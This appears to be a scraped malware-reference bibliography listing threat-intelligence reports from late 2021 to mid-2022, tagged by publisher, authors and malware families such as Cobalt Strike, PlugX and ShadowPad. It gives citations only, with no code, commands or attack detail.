2022-05-06 ⋅ The Hacker News ⋅ Ravie Lakshmanan ⋅ This New Fileless Malware Hides Shellcode in Windows Event Logs ⋅ Cobalt Strike
2022-05-05 ⋅ Cisco Talos ⋅ Aliza Berk, Asheer Malhotra, Jung soo An, Justin Thattil, Kendall McKay ⋅ Mustang Panda deploys a new wave of malware targeting Europe ⋅ Cobalt Strike, Meterpreter, PlugX, Unidentified 094
2022-05-04 ⋅ Kaspersky ⋅ Denis Legezo ⋅ A new secret stash for “fileless” malware ⋅ Cobalt Strike
2022-05-04 ⋅ Twitter (@felixw3000) ⋅ Felix ⋅ Twitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC. ⋅ Cobalt Strike, IcedID, PhotoLoader
2022-05-03 ⋅ Recorded Future ⋅ Insikt Group® ⋅ SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse ⋅ Cobalt Strike, EnvyScout
2022-05-03 ⋅ Cluster25 ⋅ Cluster25 ⋅ The Strange Link Between A Destructive Malware And A Ransomware-Gang Linked Custom Loader: IsaacWiper Vs Vatet ⋅ Cobalt Strike, IsaacWiper, PyXie
2022-05-03 ⋅ Recorded Future ⋅ Insikt Group ⋅ SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse ⋅ Cobalt Strike
2022-05-02 ⋅ Sentinel LABS ⋅ Amitai Ben Shushan Ehrlich, Joey Chen ⋅ Moshen Dragon’s Triad-and-Error Approach | Abusing Security Software to Sideload PlugX and ShadowPad ⋅ PlugX, ShadowPad, Moshen Dragon
2022-05-02 ⋅ Cisco Talos ⋅ Jaime Filson, Kendall McKay, Paul Eubanks ⋅ Conti and Hive ransomware operations: Leveraging victim chats for insights ⋅ Cobalt Strike, Conti, Hive
2022-05-02 ⋅ Macnica ⋅ Hiroshi Takeuchi ⋅ Attack Campaigns that Exploit Shortcuts and ISO Files ⋅ Cobalt Strike
2022-04-28 ⋅ PWC ⋅ PWC UK ⋅ Cyber Threats 2021: A Year in Retrospect ⋅ BPFDoor, APT15, APT31, APT41, APT9, BlackTech, BRONZE EDGEWOOD, DAGGER PANDA, Earth Lusca, HAFNIUM, HAZY TIGER, Inception Framework, LOTUS PANDA, QUILTED TIGER, RedAlpha, Red Dev 17, Red Menshen, Red Nue, VICEROY TIGER
2022-04-28 ⋅ PWC ⋅ PWC UK ⋅ Cyber Threats 2021: A Year in Retrospect (Annex) ⋅ Cobalt Strike, Conti, PlugX, RokRAT, Inception Framework, Red Menshen
2022-04-28 ⋅ DARKReading ⋅ Jai Vijayan ⋅ Chinese APT Bronze President Mounts Spy Campaign on Russian Military ⋅ PlugX, MUSTANG PANDA
2022-04-28 ⋅ Mandiant ⋅ Anders Vejlby, John Wolfram, Nick Simonian, Sarah Hawley, Tyler McLellan ⋅ Trello From the Other Side: Tracking APT29 Phishing Campaigns ⋅ Cobalt Strike
2022-04-27 ⋅ Trendmicro ⋅ Trendmicro ⋅ IOCs for Earth Berberoka - Windows ⋅ AsyncRAT, Cobalt Strike, PlugX, Quasar RAT, Earth Berberoka
2022-04-27 ⋅ Secureworks ⋅ Counter Threat Unit Research Team ⋅ BRONZE PRESIDENT Targets Russian Speakers with Updated PlugX ⋅ PlugX
2022-04-27 ⋅ ANSSI ⋅ ANSSI ⋅ LE GROUPE CYBERCRIMINEL FIN7 ⋅ Bateleur, BELLHOP, Griffon, SQLRat, POWERSOURCE, Andromeda, BABYMETAL, BlackCat, BlackMatter, BOOSTWRITE, Carbanak, Cobalt Strike, DNSMessenger, Dridex, DRIFTPIN, Gameover P2P, MimiKatz, Murofet, Qadars, Ranbyus, SocksBot
2022-04-27 ⋅ Trend Micro ⋅ Daniel Lunghi, Jaromír Hořejší ⋅ New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware ⋅ HelloBot, AsyncRAT, Ghost RAT, HelloBot, PlugX, Quasar RAT, Earth Berberoka
2022-04-27 ⋅ Mandiant ⋅ Mandiant ⋅ Assembling the Russian Nesting Doll: UNC2452 Merged into APT29 ⋅ Cobalt Strike, Raindrop, SUNBURST, TEARDROP
2022-04-27 ⋅ Trendmicro ⋅ Daniel Lunghi, Jaromír Hořejší ⋅ Operation Gambling Puppet ⋅ reptile, oRAT, AsyncRAT, Cobalt Strike, DCRat, Ghost RAT, PlugX, Quasar RAT, Trochilus RAT, Earth Berberoka
2022-04-27 ⋅ Sentinel LABS ⋅ James Haughom, Jim Walter, Júlio Dantas ⋅ LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility ⋅ Cobalt Strike, LockBit
2022-04-27 ⋅ Sentinel LABS ⋅ James Haughom, Jim Walter, Júlio Dantas ⋅ LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility ⋅ Cobalt Strike, LockBit, BRONZE STARLIGHT
2022-04-26 ⋅ Trend Micro ⋅ Lord Alfred Remorin, Ryan Flores, Stephen Hilt ⋅ How Cybercriminals Abuse Cloud Tunneling Services ⋅ AsyncRAT, Cobalt Strike, DarkComet, Meterpreter, Nanocore RAT
2022-04-26 ⋅ Intel 471 ⋅ Intel 471 ⋅ Conti and Emotet: A constantly destructive duo ⋅ Cobalt Strike, Conti, Emotet, IcedID, QakBot, TrickBot
2022-04-25 ⋅ The DFIR Report ⋅ The DFIR Report ⋅ Quantum Ransomware ⋅ Cobalt Strike, IcedID
2022-04-25 ⋅ Morphisec ⋅ Morphisec Labs ⋅ New Core Impact Backdoor Delivered Via VMware Vulnerability ⋅ Cobalt Strike, JSSLoader
2022-04-21 ⋅ ZeroSec ⋅ Andy Gill ⋅ Understanding Cobalt Strike Profiles - Updated For Cobalt Strike 4.6 ⋅ Cobalt Strike
2022-04-19 ⋅ Blake's R&D ⋅ bmcder02 ⋅ Extracting Cobalt Strike from Windows Error Reporting ⋅ Cobalt Strike
2022-04-19 ⋅ Varonis ⋅ Nadav Ovadia ⋅ Hive Ransomware Analysis ⋅ Cobalt Strike, Hive, MimiKatz
2022-04-18 ⋅ AdvIntel ⋅ Vitali Kremez, Yelisey Boguslavskiy ⋅ Enter KaraKurt: Data Extortion Arm of Prolific Ransomware Group ⋅ AvosLocker, BazarBackdoor, BlackByte
BlackCat
Cobalt Strike
HelloKitty
Hive
Karakurt
×Select Content2022-04-18
⋅
SentinelOne
⋅
James HaughomFrom the Front Lines | Peering into A PYSA Ransomware Attack Chisel
Chisel
Cobalt Strike
Mespinoza
×Select Content2022-04-18
⋅
vanmieghem
⋅
Vincent Van MieghemA blueprint for evading industry leading endpoint protection in 2022 Cobalt Strike
×Select Content2022-04-14
⋅
NSHC RedAlert Labs
⋅
NSHC Threatrecon TeamHacking activity of SectorB Group in 2021 Chinese government supported hacking group SectorB PlugX
×Select Content2022-04-14
⋅
Cynet
⋅
Max MalyutinOrion Threat Alert: Flight of the BumbleBee BumbleBee
Cobalt Strike
×Select Content2022-04-13
⋅
ESET Research
⋅
Jean-Ian Boutin,
Tomáš ProcházkaESET takes part in global operation to disrupt Zloader botnets Cobalt Strike
Zloader
×Select Content2022-04-13
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence TeamDismantling ZLoader: How malicious ads led to disabled security tools and ransomware BlackMatter
Cobalt Strike
DarkSide
Ryuk
Zloader
×Select Content2022-04-12
⋅
Max Kersten's Blog
⋅
Max KerstenGhidra script to handle stack strings CaddyWiper
PlugX
×Select Content2022-04-08
⋅
The Register
⋅
Laura DobbersteinChina accused of cyberattacks on Indian power grid ShadowPad
×Select Content2022-04-08
⋅
Infinitum Labs
⋅
Arda BüyükkayaThreat Spotlight: Conti Ransomware Group Behind the Karakurt Hacking Team Cobalt Strike
MimiKatz
×Select Content2022-04-07
⋅
splunk
⋅
Splunk Threat Research TeamYou Bet Your Lsass: Hunting LSASS Access Cobalt Strike
MimiKatz
×Select Content2022-04-07
⋅
InQuest
⋅
Nick Chalard,
Will MacArthurUkraine CyberWar Overview CyclopsBlink
Cobalt Strike
GraphSteel
GrimPlant
HermeticWiper
HermeticWizard
MicroBackdoor
PartyTicket
Saint Bot
Scieron
WhisperGate
×Select Content2022-04-06
⋅
Github (infinitumlabs)
⋅
Arda BüyükkayaKarakurt Hacking Team Indicators of Compromise (IOC) Cobalt Strike
×Select Content2022-04-06
⋅
Recorded Future
⋅
Insikt GroupContinued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group ShadowPad
×Select Content2022-04-06
⋅
Recorded Future
⋅
Insikt Group®Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group (TAG-38) ShadowPad
×Select Content2022-04-04
⋅
Mandiant
⋅
Brendan McKeague,
Bryce Abdo,
Ioana Teaca,
Zander WorkFIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7 Griffon
BABYMETAL
Carbanak
Cobalt Strike
JSSLoader
Termite
×Select Content2022-03-31
⋅
nccgroup
⋅
Alex Jessop,
Nikolaos Pantazopoulos,
RIFT: Research and Intelligence Fusion Team,
Simon BiggsConti-nuation: methods and techniques observed in operations post the leaks Cobalt Strike
Conti
QakBot
×Select Content2022-03-31
⋅
SC Media
⋅
SC StaffNovel obfuscation leveraged by Hive ransomware Cobalt Strike
Hive
×Select Content2022-03-30
⋅
Bleeping Computer
⋅
Bill ToulasPhishing campaign targets Russian govt dissidents with Cobalt Strike Unidentified PS 002 (RAT)
Cobalt Strike
×Select Content2022-03-30
⋅
Prevailion
⋅
PrevailionWizard Spider continues to confound BazarBackdoor
Cobalt Strike
Emotet
×Select Content2022-03-29
⋅
Malwarebytes Labs
⋅
Hossein JaziNew spear phishing campaign targets Russian dissidents Unidentified PS 002 (RAT)
Cobalt Strike
×Select Content2022-03-29
⋅
SentinelOne
⋅
Antonis Terefos,
James Haughom,
Jeff Cavanaugh,
Jim Walter,
Nick Fox,
Shai TiliasFrom the Front Lines | Hive Ransomware Deploys Novel IPfuscation Technique To Avoid Detection Cobalt Strike
Hive
×Select Content2022-03-28
⋅
Mandiant
⋅
Brandon Wilbur,
Dallin Warne,
Geoff Ackerman,
James Maclachlan,
John Wolfram,
Tufail AhmedForged in Fire: A Survey of MobileIron Log4Shell Exploitation KEYPLUG
×Select Content2022-03-28
⋅
Trellix
⋅
Marc Elias,
Max KerstenPlugX: A Talisman to Behold PlugX
×Select Content2022-03-28
⋅
Medium walmartglobaltech
⋅
Jason ReavesCobaltStrike UUID stager Cobalt Strike
×Select Content2022-03-25
⋅
nccgroup
⋅
Yun Zheng HuMining data from Cobalt Strike beacons Cobalt Strike
×Select Content2022-03-25
⋅
⋅
ESET Research
⋅
Alexandre Côté CyrMustang Panda's Hodur: Old stuff, new variant of Korplug PlugX
×Select Content2022-03-25
⋅
GOV.UA
⋅
State Service of Special Communication and Information Protection of Ukraine (CIP)Who is behind the Cyberattacks on Ukraine's Critical Information Infrastructure: Statistics for March 15-22 Xloader
Agent Tesla
CaddyWiper
Cobalt Strike
DoubleZero
GraphSteel
GrimPlant
HeaderTip
HermeticWiper
IsaacWiper
MicroBackdoor
Pandora RAT
×Select Content2022-03-24
⋅
Threat Post
⋅
Nate NelsonChinese APT Combines Fresh Hodur RAT with Complex Anti-Detection PlugX
×Select Content2022-03-23
⋅
BleepingComputer
⋅
Bill ToulasNew Mustang Panda hacking campaign targets diplomats, ISPs PlugX
×Select Content2022-03-23
⋅
ESET Research
⋅
Alexandre Côté CyrMustang Panda’s Hodur: Old tricks, new Korplug variant PlugX
×Select Content2022-03-22
⋅
Red Canary
⋅
Red Canary2022 Threat Detection Report FAKEUPDATES
Silver Sparrow
BazarBackdoor
Cobalt Strike
GootKit
Yellow Cockatoo RAT
×Select Content2022-03-22
⋅
NVISO Labs
⋅
Didier StevensCobalt Strike: Overview – Part 7 Cobalt Strike
×Select Content2022-03-21
⋅
Threat Post
⋅
Lisa VaasConti Ransomware V. 3, Including Decryptor, Leaked Cobalt Strike
Conti
TrickBot
×Select Content2022-03-21
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)Conti Affiliate Exposed: New Domain Names, IP Addresses and Email Addresses Uncovered HelloKitty
BazarBackdoor
Cobalt Strike
Conti
FiveHands
HelloKitty
IcedID
×Select Content2022-03-17
⋅
⋅
Benoit Sevens,
Google Threat Analysis Group,
Vladislav StolyarovExposing initial access broker with ties to Conti BazarBackdoor
BumbleBee
Cobalt Strike
Conti
×Select Content2022-03-16
⋅
paloalto Netoworks: Unit42
⋅
Andrew Guan,
Chris Navarrete,
Durgesh Sangvikar,
Siddhart Shibiraj,
Yanhui Jia,
Yu FuCobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect Cobalt Strike
×Select Content2022-03-16
⋅
SANS ISC
⋅
Brad DuncanQakbot infection with Cobalt Strike and VNC activity Cobalt Strike
QakBot
×Select Content2022-03-16
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanQakbot infection with Cobalt Strike and VNC activity Cobalt Strike
QakBot
×Select Content2022-03-15
⋅
Prevailion
⋅
Matt Stafford,
Sherman SmithWhat Wicked Webs We Un-weave Cobalt Strike
Conti
×Select Content2022-03-15
⋅
SentinelOne
⋅
Amitai Ben Shushan EhrlichThreat Actor UAC-0056 Targeting Ukraine with Fake Translation Software Cobalt Strike
GraphSteel
GrimPlant
SaintBear
×Select Content2022-03-14
⋅
Bleeping Computer
⋅
Bill ToulasFake antivirus updates used to deploy Cobalt Strike in Ukraine Cobalt Strike
×Select Content2022-03-13
⋅
Mandiant
⋅
MandiantAPT41 (Double Dragon): A Dual Espionage and Cyber Crime Operation APT41
×Select Content2022-03-12
⋅
Arash's Blog
⋅
Arash ParsaAnalyzing Malware with Hooks, Stomps, and Return-addresses Cobalt Strike
×Select Content2022-03-11
⋅
⋅
Cert-UACyberattack on Ukrainian state authorities using the Cobalt Strike Beacon (CERT-UA#4145) Cobalt Strike
×Select Content2022-03-09
⋅
Bleeping Computer
⋅
Ionut IlascuCISA updates Conti ransomware alert with nearly 100 domain names BazarBackdoor
Cobalt Strike
Conti
TrickBot
×Select Content2022-03-09
⋅
BreachQuest
⋅
Bernard Silvestrini,
Marco Figueroa,
Napoleon BingThe Conti Leaks | Insight into a Ransomware Unicorn Cobalt Strike
MimiKatz
TrickBot
×Select Content2022-03-08
⋅
Twitter (@CyberJack42)
⋅
CyberJackTweet on ELFSHELF alias for KEYPLUG KEYPLUG
×Select Content2022-03-08
⋅
Mandiant
⋅
Douglas Bienstock,
Geoff Ackerman,
John Wolfram,
Rufus Brown,
Van TaDoes This Look Infected? A Summary of APT41 Targeting U.S. State Governments KEYPLUG
Cobalt Strike
LOWKEY
×Select Content2022-03-07
⋅
Proofpoint
⋅
Michael Raggi,
Myrtus 0x0The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates PlugX
MUSTANG PANDA
×Select Content2022-03-07
⋅
The DFIR Report
⋅
The DFIR Report2021 Year In Review Cobalt Strike
×Select Content2022-03-04
⋅
Telsy
⋅
TelsyLegitimate Sites Used As Cobalt Strike C2s Against Indian Government Cobalt Strike
×Select Content2022-03-03
⋅
Trend Micro
⋅
Trend Micro ResearchCyberattacks are Prominent in the Russia-Ukraine Conflict BazarBackdoor
Cobalt Strike
Conti
Emotet
WhisperGate
×Select Content2022-03-01
⋅
VirusTotal
⋅
VirusTotalVirusTotal's 2021 Malware Trends Report Anubis
AsyncRAT
BlackMatter
Cobalt Strike
DanaBot
Dridex
Khonsari
MimiKatz
Mirai
Nanocore RAT
Orcus RAT
×Select Content2022-02-26
⋅
Mandiant
⋅
MandiantTRENDING EVIL Q1 2022 KEYPLUG
FAKEUPDATES
GootLoader
BazarBackdoor
QakBot
×Select Content2022-02-24
⋅
Cynet
⋅
Max MalyutinNew Wave of Emotet – When Project X Turns Into Y Cobalt Strike
Emotet
×Select Content2022-02-24
⋅
Fortinet
⋅
Fred GutierrezNobelium Returns to the Political World Stage Cobalt Strike
×Select Content2022-02-23
⋅
cyber.wtf blog
⋅
Luca EbachWhat the Pack(er)? Cobalt Strike
Emotet
×Select Content2022-02-23
⋅
Dragos
⋅
Dragos2021 ICS OT Cybersecurity Year In Review ShadowPad
×Select Content2022-02-23
⋅
AdvIntel
⋅
Vitali Kremez,
Yelisey Boguslavskiy24 Hours From Log4Shell to Local Admin: Deep-Dive Into Conti Gang Attack on Fortune 500 (DFIR) Cobalt Strike
Conti
×Select Content2022-02-23
⋅
SophosLabs Uncut
⋅
Andrew BrandtDridex bots deliver Entropy ransomware in recent attacks Cobalt Strike
Dridex
Entropy
×Select Content2022-02-22
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)IcedID to Cobalt Strike In Under 20 Minutes Cobalt Strike
IcedID
PhotoLoader
×Select Content2022-02-22
⋅
Bleeping Computer
⋅
Bill ToulasVulnerable Microsoft SQL Servers targeted with Cobalt Strike Cobalt Strike
Kingminer
Lemon Duck
×Select Content2022-02-21
⋅
ASECCobalt Strike Being Distributed to Vulnerable MS-SQL Servers Cobalt Strike
Lemon Duck
×Select Content2022-02-21
⋅
The DFIR ReportQbot and Zerologon Lead To Full Domain Compromise Cobalt Strike
QakBot
×Select Content2022-02-20
⋅
Medium SOCFortress
⋅
SOCFortressDetecting Cobalt Strike Beacons Cobalt Strike
×Select Content2022-02-18
⋅
Huntress Labs
⋅
Matthew BrennanHackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection Cobalt Strike
×Select Content2022-02-17
⋅
SinaCyber
⋅
Adam KozyTestimony before the U.S.-China Economic and Security Review Commission Hearing on “China’s Cyber Capabilities: Warfare, Espionage, and Implications for the United States” PlugX
APT26
APT41
×Select Content2022-02-16
⋅
Security Onion
⋅
Doug BurksQuick Malware Analysis: Emotet Epoch 5 and Cobalt Strike pcap from 2022-02-08 Cobalt Strike
Emotet
×Select Content2022-02-15
⋅
The Hacker News
⋅
Ravie LakshmananResearchers Link ShadowPad Malware Attacks to Chinese Ministry and PLA ShadowPad
×Select Content2022-02-15
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)Increase in Emotet Activity and Cobalt Strike Deployment Cobalt Strike
Emotet
×Select Content2022-02-15
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamShadowPad Malware Analysis ShadowPad
×Select Content2022-02-10
⋅
Cybereason
⋅
Cybereason Global SOC TeamThreat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot Cobalt Strike
Emotet
IcedID
QakBot
×Select Content2022-02-09
⋅
vmware
⋅
VMWareExposing Malware in Linux-Based Multi-Cloud Environments ACBackdoor
BlackMatter
DarkSide
Erebus
HelloKitty
Kinsing
PLEAD
QNAPCrypt
RansomEXX
REvil
Sysrv-hello
TeamTNT
Vermilion Strike
Cobalt Strike
×Select Content2022-01-31
⋅
CyberArk
⋅
Arash ParsaAnalyzing Malware with Hooks, Stomps and Return-addresses Cobalt Strike
×Select Content2022-01-28
⋅
Morphisec
⋅
Morphisec LabsLog4j Exploit Hits Again: Vulnerable Unifi Network Application (Ubiquiti) at Risk Cobalt Strike
×Select Content2022-01-27
⋅
JSAC 2021
⋅
Hajime Yanagishita,
Kiyotaka Tamada,
Suguru Ishimaru,
You NakatsuruWhat We Can Do against the Chaotic A41APT Campaign CHINACHOPPER
Cobalt Strike
HUI Loader
SodaMaster
×Select Content2022-01-26
⋅
Blackberry
⋅
Codi Starks,
Ryan Gibson,
Will IkardLog4U, Shell4Me Cobalt Strike
×Select Content2022-01-25
⋅
Cynet
⋅
Orion Threat Research and Intelligence TeamThreats Looming Over the Horizon Cobalt Strike
Meterpreter
NightSky
×Select Content2022-01-24
⋅
The DFIR Report
⋅
The DFIR ReportCobalt Strike, a Defender’s Guide – Part 2 Cobalt Strike
×Select Content2022-01-21
⋅
binarly
⋅
Binarly TeamA deeper UEFI dive into MoonBounce MoonBounce
×Select Content2022-01-20
⋅
Morphisec
⋅
Michael GorelikLog4j Exploit Hits Again: Vulnerable VMWare Horizon Servers at Risk Cobalt Strike
×Select Content2022-01-20
⋅
Kaspersky
⋅
Denis Legezo,
Ilya Borisov,
Mark Lechtik,
Vasily BerdnikovMoonBounce: the dark side of UEFI firmware MoonBounce
×Select Content2022-01-20
⋅
Kaspersky Labs
⋅
Denis Legezo,
Ilya Borisov,
Mark Lechtik,
Vasily BerdnikovTechnical details of MoonBounce’s implementation MoonBounce
×Select Content2022-01-19
⋅
Elastic
⋅
Andrew Pease,
Daniel Stepanic,
Derek Ditch,
Seth GoodwinExtracting Cobalt Strike Beacon Configurations Cobalt Strike
×Select Content2022-01-19
⋅
Blackberry
⋅
The BlackBerry Research & Intelligence TeamKraken the Code on Prometheus Prometheus Backdoor
BlackMatter
Cerber
Cobalt Strike
DCRat
Ficker Stealer
QakBot
REvil
Ryuk
×Select Content2022-01-19
⋅
Elastic
⋅
Andrew Pease,
Daniel Stepanic,
Derek Ditch,
Seth GoodwinCollecting Cobalt Strike Beacons with the Elastic Stack Cobalt Strike
×Select Content2022-01-19
⋅
Sophos
⋅
Colin Cowie,
Mat Gangwer,
Sophos MTR Team,
Stan AndicZloader Installs Remote Access Backdoors and Delivers Cobalt Strike Cobalt Strike
Zloader
×Select Content2022-01-18
⋅
Recorded Future
⋅
Insikt Group®2021 Adversary Infrastructure Report BazarBackdoor
Cobalt Strike
Dridex
IcedID
QakBot
TrickBot
×Select Content2022-01-17
⋅
Trend Micro
⋅
Cedric Pernet,
Daniel Lunghi,
Gloria Chen,
Jaromír Hořejší,
Joseph Chen,
Kenney LuDelving Deep: An Analysis of Earth Lusca’s Operations BIOPASS
Cobalt Strike
FunnySwitch
JuicyPotato
ShadowPad
Winnti
Earth Lusca
×Select Content2022-01-16
⋅
forensicitguy
⋅
Tony LambertAnalyzing a CACTUSTORCH HTA Leading to Cobalt Strike CACTUSTORCH
Cobalt Strike
×Select Content2022-01-15
⋅
Huntress Labs
⋅
Team HuntressThreat Advisory: VMware Horizon Servers Actively Being Hit With Cobalt Strike (by DEV-0401) Cobalt Strike
×Select Content2022-01-11
⋅
Medium walmartglobaltech
⋅
Jason Reaves,
Joshua PlattSigned DLL campaigns as a service BATLOADER
Cobalt Strike
ISFB
Zloader
×Select Content2022-01-11
⋅
Twitter (@cglyer)
⋅
Christopher GlyerThread on DEV-0401, a china based ransomware operator exploiting VMware Horizon with log4shell and deploying NightSky ransomware Cobalt Strike
NightSky
×Select Content2022-01-11
⋅
Cybereason
⋅
Chen Erlich,
Daichi Shimabukuro,
Niv Yona,
Ofir Ozer,
Omri RefaeliThreat Analysis Report: DatopLoader Exploits ProxyShell to Deliver QBOT and Cobalt Strike Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2022-01-09
⋅
forensicitguy
⋅
Tony LambertInspecting a PowerShell Cobalt Strike Beacon Cobalt Strike
×Select Content2022-01-06
⋅
Cyber And Ramen blog
⋅
Mike RA “GULP” of PlugX PlugX
×Select Content2022-01-06
⋅
Sekoia
⋅
sekoiaNOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies Cobalt Strike
EnvyScout
×Select Content2022-01-01
⋅
Silent Push
⋅
Silent PushConsequences- The Conti Leaks and future problems Cobalt Strike
Conti
×Select Content2021-12-29
⋅
CrowdStrike
⋅
Benjamin Wiley,
Falcon OverWatch TeamOverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt Cobalt Strike
×Select Content2021-12-29
⋅
Blake's R&D
⋅
BlakeCobalt Strike DFIR: Listening to the Pipes Cobalt Strike
×Select Content2021-12-28
⋅
Morphus Labs
⋅
Renato MarinhoAttackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons Cobalt Strike
×Select Content2021-12-22
⋅
Telsy
⋅
Telsy Research TeamPhishing Campaign targeting citizens abroad using COVID-19 theme lures Cobalt Strike
×Select Content2021-12-17
⋅
FBI
⋅
FBIAC-000159-MW: APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central (CVE-2021-44515) ShadowPad
×Select Content2021-12-16
⋅
TEAMT5
⋅
Aragorn Tseng,
Charles Li,
Peter Syu,
Tom LaiWinnti is Coming - Evolution after Prosecution Cobalt Strike
FishMaster
FunnySwitch
HIGHNOON
ShadowPad
Spyder
×Select Content2021-12-16
⋅
Red Canary
⋅
The Red Canary TeamIntelligence Insights: December 2021 Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2021-12-10
⋅
Accenture
⋅
AccentureKarakurt rises from its lair Cobalt Strike
Karakurt
×Select Content2021-12-08
⋅
PWC UK
⋅
Adam PrescottChasing Shadows: A deep dive into the latest obfuscation methods being used by ShadowPad ShadowPad
Earth Lusca
×Select Content2021-12-07
⋅
Bleeping Computer
⋅
Lawrence AbramsEmotet now drops Cobalt Strike, fast forwards ransomware attacks Cobalt Strike
Emotet
×Select Content2021-12-06
⋅
CERT-FR
⋅
CERT-FRPhishing campaigns by the Nobelium intrusion set Cobalt Strike
×Select Content2021-12-06
⋅
Mandiant
⋅
Ashraf Abdalhalim,
Ben Read,
Doug Bienstock,
Gabriella Roncone,
Jonathan Leathery,
Josh Madeley,
Juraj Sucik,
Luis Rocha,
Luke Jenkins,
Manfred Erjak,
Marius Fodoreanu,
Microsoft Detection and Response Team (DART),
Microsoft Threat Intelligence Center (MSTIC),
Mitchell Clarke,
Parnian Najafi,
Sarah Hawley,
Wojciech LedzionSuspected Russian Activity Targeting Government and Business Entities Around the Globe (UNC2452) Cobalt Strike
CryptBot
×Select Content2021-12-02
⋅
CERT-FR
⋅
CERT-FRPhishing Campaigns by the Nobelium Intrusion Set Cobalt Strike
×Select Content2021-12-01
⋅
ESET Research
⋅
Alexis Dorais-Joncas,
Facundo MuñozJumping the air gap: 15 years of nation‑state effort Agent.BTZ
Fanny
Flame
Gauss
PlugX
Ramsay
Retro
Stuxnet
USBCulprit
USBferry
×Select Content2021-11-30
⋅
Symantec
⋅
Symantec Threat Hunter TeamYanluowang: Further Insights on New Ransomware Threat BazarBackdoor
Cobalt Strike
FiveHands
×Select Content2021-11-29
⋅
The DFIR Report
⋅
The DFIR ReportCONTInuing the Bazar Ransomware Story BazarBackdoor
Cobalt Strike
Conti
×Select Content2021-11-29
⋅
Mandiant
⋅
Brandan Schondorfer,
Tyler McLellanKitten.gif: Meet the Sabbath Ransomware Affiliate Program, Again Cobalt Strike
ROLLCOAST
×Select Content2021-11-19
⋅
Trend Micro
⋅
Abdelrhman Sharshar,
Mohamed Fahmy,
Sherif MagdySquirrelwaffle Exploits ProxyShell and ProxyLogon to Hijack Email Chains Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2021-11-19
⋅
insomniacs(Medium)
⋅
Asuna AmawakaIt’s a BEE! It’s a… no, it’s ShadowPad. ShadowPad
×Select Content2021-11-18
⋅
Cisco
⋅
Josh PyorreBlackMatter, LockBit, and THOR BlackMatter
LockBit
PlugX
×Select Content2021-11-17
⋅
nviso
⋅
Didier StevensCobalt Strike: Decrypting Obfuscated Traffic – Part 4 Cobalt Strike
×Select Content2021-11-17
⋅
Black Hills Information Security
⋅
Kyle AveryDNS Over HTTPS for Cobalt Strike Cobalt Strike
×Select Content2021-11-17
⋅
Twitter (@Unit42_Intel)
⋅
Unit 42Tweet on Matanbuchus Loader used to deliver Qakbot (tag obama128b) and follow-up CobaltStrike Cobalt Strike
QakBot
×Select Content2021-11-17
⋅
Trend Micro
⋅
Abdelrhman Sharshar,
Mohamed Fahmy,
Ryan Maglaque,
Sherif MagdyAnalyzing ProxyShell-related Incidents via Trend Micro Managed XDR Cobalt Strike
Cotx RAT
×Select Content2021-11-16
⋅
Cisco
⋅
Asheer Malhotra,
Chetan Raghuprasad,
Vanja SvajcerAttackers use domain fronting technique to target Myanmar with Cobalt Strike Cobalt Strike
×Select Content2021-11-16
⋅
IronNet
⋅
IronNet Threat Research,
Joey Fitzpatrick,
Morgan Demboski,
Peter RydzynskiHow IronNet's Behavioral Analytics Detect REvil and Conti Ransomware Cobalt Strike
Conti
IcedID
REvil
×Select Content2021-11-16
⋅
Blackberry
⋅
Dean Given,
Eoin Wickens,
Jim Simpson,
Marta Janus,
T.J. O'Leary,
Tom BonnerFinding Beacons in the dark Cobalt Strike
×Select Content2021-11-15
⋅
TRUESEC
⋅
Fabio ViggianiProxyShell, QBot, and Conti Ransomware Combined in a Series of Cyberattacks Cobalt Strike
Conti
QakBot
×Select Content2021-11-13
⋅
Just Still
⋅
Still HsuThreat Spotlight - Domain Fronting Cobalt Strike
×Select Content2021-11-12
⋅
Malwarebytes
⋅
Hossein JaziA multi-stage PowerShell based attack targets Kazakhstan Cobalt Strike
×Select Content2021-11-11
⋅
Cynet
⋅
Max MalyutinA Duck Nightmare Quakbot Strikes with QuakNightmare Exploitation Cobalt Strike
QakBot
×Select Content2021-11-10
⋅
AT&T
⋅
Josh GomezStories from the SOC - Powershell, Proxyshell, Conti TTPs OH MY! Cobalt Strike
Conti
×Select Content2021-11-10
⋅
Sekoia
⋅
Cyber Threat Intelligence teamWalking on APT31 infrastructure footprints Rekoobe
Unidentified ELF 004
Cobalt Strike
×Select Content2021-11-09
⋅
Cybereason
⋅
Aleksandar Milenkoski,
Eli SalemTHREAT ANALYSIS REPORT: From Shatak Emails to the Conti Ransomware Cobalt Strike
Conti
×Select Content2021-11-05
⋅
Blackberry
⋅
The BlackBerry Research & Intelligence TeamHunter Becomes Hunted: Zebra2104 Hides a Herd of Malware Cobalt Strike
DoppelDridex
Mount Locker
Phobos
StrongPity
×Select Content2021-11-05
⋅
Twitter (@Unit42_Intel)
⋅
Unit 42Tweet on TA551 (Shathak) BazarLoader infection with CobaltStrike and DarkVNC drops BazarBackdoor
Cobalt Strike
×Select Content2021-11-04
⋅
Youtube (Virus Bulletin)
⋅
Joey Chen,
